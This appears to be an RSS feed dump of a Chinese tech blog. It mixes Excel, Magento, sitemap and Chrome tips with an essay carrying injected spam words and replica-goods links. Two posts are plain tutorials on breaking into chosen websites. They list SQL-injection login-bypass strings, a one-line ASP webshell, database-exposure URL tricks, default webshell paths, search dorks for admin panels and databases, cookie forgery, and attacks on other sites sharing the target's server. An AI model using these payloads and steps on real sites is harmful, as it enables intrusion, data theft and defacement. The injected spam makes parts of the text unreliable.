http://www.machanghai.com 宁波和众互联科技有限公司 Tue, 06 Jul 2010 09:06:03 +0000 http://backend.userland.com/rss092 en 假设你原有的3500行数据在A列,从A1:A3500, 按下ALT+F11,插入-模块,复制下列代码,按F5运行.这3500个数据会乱序排在C列.原A列的数据就没有了.如果很重要,请保存 Sub bbb() Dim a As Integer Dim b As Integer Dim c As Integer a = WorksheetFunction.CountA(Range("a:a")) c = 1 Do While c <= a b = Int(Rnd * a) + 1 If Cells(b, 1).Value <> "" Then Cells(b, 1).Select Selection.Cut Cells(c, 3).Select ActiveSheet.Paste c = c + 1 Else End If Loop End Sub http://www.machanghai.com/archives/874 Sitemaps.org - 想了解更多关于XML网站地图？点进去看看。 Google Webmaster Tools Sitemap Generator - Google 网管工具可以帮你自动生成XML网站地图，然后你可以用这个工具看看Google能收录多少。 XML-Sitemaps.com - 可能是最容易使用的创建XML网站地图的工具了，而且是免费的。只要输入你的URL然后等一会就好了。然后你就可以把这个XML上传到你的服务器上。这个工具甚至能让你设置网站地图更新的频率。我自己用过好几次了。 AutoSitemap - 这个很像XML-Sitemaps.com。使用AutoSitemap你可以创建非常大（差不多50，000个页面）的XML网站地图。这个是免费的，付费的版本有更多的功能。 Sitemaps-Builder.com - 一个免费的在线的创建XML网站地图的小工具。 XMLSitemap.com - 另一个免费在线网站地图生成器。这个可以让你设置自动更新的频率。 Google Sitemap Validator - Smart IT Consulting 提供免费的XML网站提供校验服务。输入URL即可开始校验。 Sitemapgen - SourceForge提供的一个可下载的网站地图生成器。我自己还没有尝试这个工具，因为有其他不需要下载的在线工具。 SitemapDoc - 在这里可以创建XML网站地图和HTML网站地图。 WriteMaps - 在线创建、编辑和共享你的网站地图。 Simple Map - 免费创建XML或HTML网站地图。 Online Sitemap Creator - 创建HTML网站地图。我试用了一下，它对网站的静态部分支持的很好，但对Blog不是很好。 AutoMapIt.com - 创建XML和HTML网站地图，它还有其他的几个工具。使用它需要帐号并需要链接回它。   WordPress 网站地图工具 Google (XML) Sitemaps Generator - 一个可以创建XML网站地图并且会自动更新的小插件。 Sitemap Generator Plugin - 来自Dagon ... http://www.machanghai.com/archives/872 示例：从http://www.machanghai.com 迁移到http://www.machanghai.net 第一步，我们需要在 PHPMYADMIN备份整个MAGENTO的数据。备份数据并且存为.SQL. 第二步，打开你的备份文件（.SQL），查找并且替换所有的 “www.machanghai.net” 到“www.machanghai.com”. 必须在导入数据之前完成，不然新的MAGENTO将会全部瘫痪。 （继续）   第三步，接着别关闭你的备份文件（.SQL），还有重要一步就是必须强制关闭相关的“数据库关键字的关系”。 请将下面的代码放在你的SQL代码的顶部： SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT; SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS; SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION; SET NAMES utf8; SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0; SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0; SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO'; SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0; 请将下面的代码放在你的SQL代码的底部： SET SQL_MODE=@OLD_SQL_MODE; SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS; SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS; SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT; SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS; SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION; SET SQL_NOTES=@OLD_SQL_NOTES; 第四步，接下来，请压缩你的SQL文件，结尾为ZIP格式。因为我的原SQL文件大约8MB，但是压缩之后只有500KB，这样可以大大加速上传的时间。记住，请用PHPMYADMIN上传。 第五步，把网站所以文件拷贝到你要迁移的服务器上 第六步，现在你需要打开htdocs/app/etc/local.xml并且修改其中的数据库连接到（对应 kissong.com）.保存你的修改。现在你的MAGENTO应该可以工作了。 第七步，而且这儿还有一样事情你需要做，那就是 .htaccess文件. 如果你迁移是从一个服务器到另外一个服务器，而且所有的绝对路径是相同的，你不需要做任何事情。 但是如果你是从子文件夹http://www.machanghai.com/ store/移动出来，你需要修改.htaccess 中 “RewriteBase/products/” 部分。并且搜索替换SQL中相关的部分，例如“http://www.machanghai.com ”换成“http://www.machanghai.com/ /products/” 。 http://www.machanghai.com/archives/864 我有一个工作表，有一片空白处需要插入现场采集的图片，插入图片后，原图片的大小为20.25“×27”，而我经笨办法缩小刚好放入空白片区后的图片大小是2.49“×2.9”，采集的图片很多，有没有省劲的办法来批量设定插入的图片刚好是2.49“×2.9”呢？ 解决办法：可以西先选中一张图片，然后按Ctrl+Shift+空格键，选择全部照片，双击图片》设置图片格式》“大小”中：调为你想要的尺寸（必要时取消“锁定纵横比”选项），“属性”里设置一下大小固定 http://www.machanghai.com/archives/862 花费了好多时间，阅读了magento官方论坛上几乎所有的批量上传产品的相关帖子，分析了大量相关magento代码，终于可以完全实现指产品批量上传的功能，免除网速慢，在页面之间跳来跳去，以及重复输入数据的烦恼，你只需要在excel中编辑数据就可以轻松实现产品批量上传到magento站点。 碰到的常见问题(统统搞定，哈哈)： 多图上传 上传后magento前台无法查看 上传后前台看不了图片 上传后前台只能看到部分图片 上传后前台的图片有重复 不能上传custom option(可以支持基于option的price,sku,sort order) (注:对外承接产品批量上传服务,1000个产品以下只收60RMB,有需要的可以联系) 实现步骤： 1、将所有的产品图片上传到magento/media/import 2、进入magento管理后台 -- import/export -- profile 选择export all product 进行基本设定后选择 run profile，你会在magento/var/export下面找到一个文件 ... http://www.machanghai.com/archives/861 世界上最快乐的事 作者： 来源：网络文章 1.花开时节，有赏花的心情。 2. 瓜果应季，喜欢瓜果的人牙好、胃口好。 3.感受春天的微风轻抚最初萌芽的青草和树叶，把稚嫩的清香散播到四面八方。 4.酷热的夏天，享受一场豪雨和随之而来的凉爽、清新、草木苍翠。 5.在秋天火一样的红叶面前停下脚步，体味凋谢前最盛大的灿烂。 6.站在温暖的窗户后面欣赏大雪最初的样子：轻盈、迷蒙、笼罩大地，洁白还无人践踏。 7.喝酒的时候，是心在应对，而不是肠胃在应对。如同焚香，要的只是一种香的氛围，而不是把香氛当氧气，这也是酒逢知己饮的本意。 8.有很够分量的情敌，cufflinks你却不战而胜，似乎比用大笔钱买到极昂贵的东西还快乐。这是棋逢对手或物有所值的含义之一。 9.生命中永存一个可以单相思的人，又不是一日不见如隔三秋的那种情怀，美中不足的生活就有了完美的寄托，如同诚信基督的教徒有一个上帝。 10.在花季结束的时候，采摘到最replica wallets后一朵玫瑰。多情的人，最后一次恋情以最美的方式成为标本。 11.说话投机：有些迷乱豁然开朗，如同苗圃除尽了杂草；有些感觉处处共鸣，如同鲜花映照在清潭。 12.没有预谋的闲聊空谈，却生出实际漂亮的事情来。如同野游采摘到美味的山果。 13.一张好碟，自己单独看一次，和自己喜欢的人看一次。 14.在稠人广众之中或者车水马龙的街头，听一首老歌，独自回味自己的心事。 15.在人群中遇到一个和自己喜欢同一个品牌的人，彼此接近，更发现还有很多相同和相通。 16.有一天突然发现自己获得了与环境cufflinks融洽相处的能力，比如，在给朋友当伴娘的时候，你是新娘之外，显得最出众的女人，不抢朋友的风头又给朋友长了脸，你够仗义；做配角也是最优秀的，你除了称职还不委屈自己。 17.有人背后称赞你，被你无意听到或者有人转告你。 18.有一个可以回去的故乡，那里有老父母、老房子，小时候爬过的那颗树以及和自己爬过树的伙伴。 19.有几个朋友，无论空间距离远近，你们之间的感觉是那样的：相见亦无事，别来常思君。 20.和老朋友信物挂碍地度replica watches过一个怀旧的下午。 21.闹些小矛盾之后与老朋友和解，丢失不起的最后并没有失去。 22.无论你是什么年龄，你有一个忘年交，是那种在你觉得幼稚的时候，有一个比你大的忘年交；在你觉得你自己老气的时候，有一个比你小的忘年交。 23.有一个异性死党，你们不谈性，而且彼此的配偶相信你们。 24. 循规蹈矩久了，脱离常规去做一件事情，得到意想不到的收获。 25.自己做的一件事情有了好的结果，但那只是花了你些许力气而不是经过了千辛万苦。实际上，来得容易的成功会给你更多的快乐。 26.在父母三十周年结婚纪念日，你发现你们生活的称呼司正在全线放映经典 爱情片，你买到两张豪华包厢的电影票作为礼物送给他们。 27.看着婴儿天天成长，不但呈现新气象，仿佛你一直屹立在玫瑰树前，凝视花朵的开放。 28.几岁的孩子会玩高级游戏，觉得你很笨，非要教你。 29.无论你的事业多么成功，你都没有被人忘记是一个女人。 30.在你打扮得最漂亮的那天，在街上偶遇你很在乎的人。 31.生活中充满交易行为，在买进的时候，你得到的可以说是物廉价美；在卖出的时候，你提供的可以说是货真价实。 32.过了四十岁，你在走进医院时还像第一天上幼儿圆一样找不到方向，被老病号和医生一起嘲笑，真是一件特别快乐的事情。 33.在一件事情即将办成的最后环节中，你被卡住了，碰巧遇到一个没有交情的人帮了你，在道谢的时候才知道，无意中你曾经给过他恩惠。事情成了，而且行善结出的善果滋味甘甜。 34.即使卖衣服是为了赚钱，但买衣服的人的确选种了他们穿在身上最好看的衣服。 35.收拾书架的时候，发现一张没有支取的存单。数目不但，但人有遗忘的财富，无论是雪中送炭还是锦上添花，都表明你的生活其实很有余地。 36.那个远在天涯的人，你在乎的喜欢的，突然像邮差那样在一个平常的日子按响了你的门铃。快乐徒然来临，一点没有企盼给你的消耗。 37.在堵车的时候选对了车道。看到胳膊边上水泄不通，自己却畅通无阻，那个时候对自己的直觉、运气、经验和先见之明都没有办法不满意，那是捡了便宜的快乐和自大狂的快乐。 38.两辆车追尾了，肇事者立即下了车赔礼，受害者却微笑着挥挥手，前面绿灯刚好亮了。这个世界有人在主动承担自己的过失，有人在大度的原谅，你正好做了旁观者。 39.早上醒来记得夜里的美梦。美梦不多且不丢失，实在很难得。 40.做了噩梦及时醒来，发现一切不是真的。 41.在自己扔的香蕉皮上差点跌倒,立刻把它拾起来放到垃圾桶，整个过程一直没有别人的眼光。对于希望晚上自己的人来说，把结果给大家，把过程给自己是快乐的。 42.回忆中的旅途生活。腰酸wholesale handbags背痛过去了，腰酸背痛得来的东西却在。 43.有人告诉你幸福的指标，你发现自己的情形和那些指标多数吻合。 44.看到流星坠落或者昙花开放。暂时不停留的东西，却给自己留下了永恒，只因为它来的时候，你等候了，或者巧遇到了。 45.用磕磕绊绊的英语给老外指了路，即使自己不足，也能帮助别人。 46.把一个哭着的孩子或少女逗笑，疼惜美好得到的快乐就像亲吻玫瑰。 47.醒来发现上班已经迟到，但突然记起是周末。 48.在人群中抽身离去，仿佛消失了，一个人韬光养晦，直到有一天开门出去，天空是另外的天空，人群是别样的人群。 49.感觉自己宁静得像山野水潭的时候。 50.听齐秦唱“人能仰望，就能幸福”，自己也觉得是这么一回事。 http://www.machanghai.com/archives/859 Google Chrome的自动升级机制保证用户可以一直使用最新版本，但很多人对这种无法自主选择的自动升级不满。现在我们就来讨论如何用组策略编辑器来自定义自动升级的规则，可以让它不要自动升级，也可以单独设置哪些程序需要自动升级，哪些不要自动升级。 　　首先下载Google官方提供的组策略模板。 　　然后打开组策略编辑器(开始-运行-输入gpedit.msc-回车)，在“管理模板”上点右键，选择“添加/删除模板”。 　　 　　然后点“添加”，把刚才下载的那个文件导入进来。 　　 　　这样，在管理模板里就能看到新增的Google项目了，展开其中的Google Update，找到Preferences，即可看到里面叫做Auto-update Check Period override设置项目。 　　 　　双击这个Auto-update Check Period override设置项目，即可打开设置窗口，其中把Disable all auto-update checks给选上就可以了。 　　 　　注意，其实在Applications目录下列出了所有的Google程序，你可以针对某一个程序专门设置让它是否自动升级。比如选择Google Chrome里的Update policy override项目。 　　 　　双击它，将其中的Policy改成手动或完全禁止升级都随你了。 　　 　　如果你用的是没有组策略编辑器的Windows XP Home或Windows Vista Home版本也没关系，你可以用注册表编辑器(开始-运行-regedit-回车)。进入后找到“HKEY_LOCAL_MACHINESOFTWAREPoliciesGoogleUpdate”这个目录，在里面增加两个新的DWORD双字节类型的键值： 　　AutoUpdateCheckPeriodMinutes 　　DisableAutoUpdateChecksCheckboxValue 　　第一个键值输入的数值表示一天多久检查一次是否有更新了，比如1440就是1440分钟。 　　第二个键值如果输入-1，就是完全禁止自动升级。输入0就是允许自动升级。 http://www.machanghai.com/archives/823 如何入侵指定网站！ 　　首先，观察指定网站。 　　入侵指定网站是需要条件的： 　　要先观察这个网站是动态还是静态的。 　　首先介绍下什么样站点可以入侵：我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点 　　如果是静态的（.htm或html）,一般是不会成功的。 　　如果要入侵的目标网站是动态的，就可以利用动态网站的漏洞进行入侵。 　　Quote:以下是入侵网站常用方法： 　　1.上传漏洞 　　如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”，80%就有漏洞了！ 　　有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传. 　　2.注入漏洞 　　字符过滤不严造成的 　　3.暴库:把二级目录中间的/换成%5c 　　4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有： 　　’or’’=’　" or "a"="a　　 ’) or (’a’=’a　　 ") or ("a"="a　　or 1=1--　 ’ or ’a’=’a 网页教学网 　　5.社会工程学。这个我们都知道吧。就是猜解。 　　6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 （数据库必需得是ASP或ASA的后缀） 　　7.源码利用：一些网站用的都是网上下载的源码.有的站长很懒.什么也不改 　　比如：默认数据库，默认后台地址，默认管理员帐号密码等 　　8.默认数据库/webshell路径利用:这样的网站很多/利人别人的 　　/Databackup/dvbbs7.MDB 　　/bbs/Databackup/dvbbs7.MDB 　　/bbs/Data/dvbbs7.MDB 　　/data/dvbbs7.mdb W7 　　/bbs/diy.asp 　　/diy.asp 　　/bbs/cmd.asp 　　/bbs/cmd.exe 　　/bbs/s-u.exe 　　/bbs/servu.exe 　　工具：网站猎手　挖掘鸡 明小子 　　9.查看目录法:一些网站可以断开目录，可以访问目录。 　　210.37.95.65 images 10.工具溢出 　　11.搜索引擎利用 　　(1).inurl:flasher_list.asp　 默认数据库:database/flash.mdb　 后台 　　(2).找网站的管理后台地址 　　site:xxxx.comintext:管理 　　site:xxxx.comintitle:管理　 〈关键字很多，自已找〉 　　(3).查找access的数据库,mssql、mysql的连接文件 　　allinurl:bbsdata 　　filetype:mdbinurl:database 　　filetype:incconn 　　inurl:datafiletype:mdb 　　12.COOKIE诈骗：把自己的ID修改成管理员的，MD5密码也修改成他的，用桂林老兵工具可以修改COOKIE。 　　13.利用常见的漏洞：如动网 　　可以先用:dvbbs权限提升工具，使自已成为前台管理员。 　　THEN，运用:动网固顶贴工具，找个固顶贴，再取得COOKIES，这个要你自已做。我们可以用WSockExpert取得Cookies/NC包 　　这个我就不做了，网上教程多的是，自已下个看看。 　　工具：dvbbs权限提升工具　 动网固顶贴工具 　　14.还有一些老漏洞。如IIS3，4的查看源码，5的 　　CGI，PHP的一些老洞，我就不说了啊。。太老了。没有什么大用途。 　　一般入侵思路 　　1.脚本漏洞:脚本注入（ASP PHP JSP）;其它脚本漏洞（上传漏洞，跨站漏洞等） 　　2.旁注:域名旁注;“IP”旁注 　　3.溢出漏洞:本地溢出;远程溢出 　　4.网络窃听:ARP欺骗;IP欺骗 　　5.社会工程学 　　简单的说，可以利用以上方法来入侵，如果这个指定网站的确没有漏洞，还可以利用其它方式。。。 　　〓通往电脑的路不止一条〓 　　如果目标网站程序没有漏洞，可以按照以下方法： 　　首先判断对方网站服务器主机的IP地址，比如：ping www.baidu.com，就可以得到百度网站的服务器IP地址，当然也可以利用旁注等工具来查询目标网站服务器的IP地址。。。 　　可以试着入侵目标网站所在的服务器，可以用旁注工具来查询这个服务器上都放了多少个网站。。。 　　如果目标网站没有漏洞，可以试着入侵同服务器上的其它网站。。。如果能够入侵同服务器上的其它网站，就可以获得权限，看能不能够提权拿到服务器等。 　　也可以直接入侵这台网站的服务器！ 　　比如：用IP端口扫描软件，扫描一下目标服务器都开放了哪些端口，然后利用开放的漏洞端口进行入侵。常见漏洞端口如何入侵，论坛已经有很多这方面的资料了。还可以查询目标服务器有哪些漏洞，比如微软最新Oday漏洞，利用漏洞拿到服务器权限。木马入侵，让网站主机感染你的木马。主要是看目标网站服务器系统是否存在漏洞。 http://www.gxredshield.com.cn/list/Replica-LV-Bags/ http://www.gxredshield.com.cn/list/Louis-Vuitton-Belts/ http://www.gxredshield.com.cn/list/Gucci-Belts/ http://www.machanghai.com/archives/805 　　首先介绍下什么样的站点可以入侵:必须是动态的网站 比如 asp php jsp 这种形式的站点 后缀为.htm的站点劝大家还是不要入侵了吧(入侵几率几乎为0) 　　入侵介绍: 1。上传漏洞 2。暴库 3。注入 4。旁注 5。COOKIE诈骗 　　1:上传漏洞，这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗，利用上传漏洞可以直接得到WEBSHELL，危害等级超级高，现在的入侵中上传漏洞也是常见的漏洞。 　　怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示 上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL 天极软件专题专区精选 Windows Vista专区  POPO专区 QQ专区　QQ挂机 注册表应用专区 Flash MX 视频教程 Photoshop视频教程 网页设计视频教程 照片处理数字暗房 PPT动画演示教程 Excel动画教程集 Word动画演示教程 Google专区 特洛伊木马专区 黑客知识教程专区 防火墙应用专区 了解Web2.0 Windows API开发专区 网络编程专区 VB数据库编程专区 图像处理与多媒体编程 　　工具介绍:上传工具 老兵的上传工具 DOMAIN3.5 这两个软件都可以达到上传的目的 用NC也可以提交 　　WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下，许多人都不理解，这里就详细讲下，其实WEBSHELL并不什么深奥的东西，是个WEB的权限，可以管理WEB，修改主页内容等权限，但是并没有什么特别高的权限，(这个看管理员的设置了)一般修改别人主页大多都需要这个权限，接触过WEB木马的朋友可能知道(比如老兵的站长助手就是WEB木马 海阳2006也是 WEB木马)我们上传漏洞最终传的就是这个东西，有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。 　　2。暴库:这个漏洞现在很少见了，但是还有许多站点有这个漏洞可以利用，暴库就是提交字符得到数据库文件，得到了数据库文件我们就直接有了站点的前台或者后台的权限了。 　　暴库方法:比如一个站的地址为 http://www.xxx.com/dispbbs.asp?boardID=7&ID=161 我门就可以把com/dispbbs中间的/换成%5c 如果有漏洞直接得到数据库的绝对路径 用寻雷什么的下载下来就可以了 还有种方法就是利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成%5c) 　　为什么换成%5c:因为在ASCII码里/等于%5c，有时碰到数据库名字为/#abc.mdb的为什么下不了? 这里需要把#号换成%23就可以下载了，为什么我暴出的数据库文件是以。ASP结尾的?我该怎么办?这里可以在下载时把。ASP换成。MDB 这样就可以下载了如果还下载不了可能作了防下载。 　　3。注入漏洞:这个漏洞是现在应用最广泛，杀伤力也很大的漏洞，可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的，可以得到管理员的帐号密码等相关资料。 　　怎样利用:我先介绍下怎样找漏洞比如这个网址 ... http://www.machanghai.com/archives/801 去掉Powered by ShopEx v4.8.4 ShopEx版权 虽然做这个事情，不怎么厚道，但是既然有很多人问了，我还是讲讲我处理这个问题的方法．大家可以参考我的站：http://www.xi-zang.com.cn 第一步：把您生成好的带有Powered by ShopEx v4.8.4这个原网页保存，取出代码： <div class="themefoot">***</div><script type="text/javascript" src="/statics/foot.js"></script></div> 注意：那个foot.js一定要拿下来第二步：找到/themes/你使用的模板/block/footer.html,用上面的代码替换<{footer}>就可以了，一定要去清除缓存哦  http://www.machanghai.com/archives/741